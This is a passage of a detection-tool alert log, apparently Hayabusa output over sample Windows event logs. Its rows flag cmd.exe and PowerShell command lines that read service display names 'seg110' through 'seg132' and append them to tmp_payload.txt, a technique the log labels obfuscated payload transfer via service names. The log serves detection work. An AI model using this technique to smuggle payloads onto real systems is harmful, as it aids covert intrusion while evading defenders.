LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:06.905 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:06.905 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:08.513 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:08.513 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:09.965 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:09.965 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:11.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:11.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:12.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:12.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa4 | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:14.417 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:14.417 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:15.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:15.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:17.309 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcbc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:17.324 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x844 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:18.812 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:18.812 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:20.265 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:20.281 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:21.715 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:21.715 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:23.168 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:23.168 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:24.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:24.615 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:26.056 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:26.072 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:27.510 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:27.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:28.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:28.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:30.412 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:30.412 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:31.851 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg127"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:31.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg127"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:33.302 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:33.318 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:34.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:34.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb38 | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:36.225 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:36.225 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:37.694 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:37.694 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfdc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:39.178 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:39.178 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 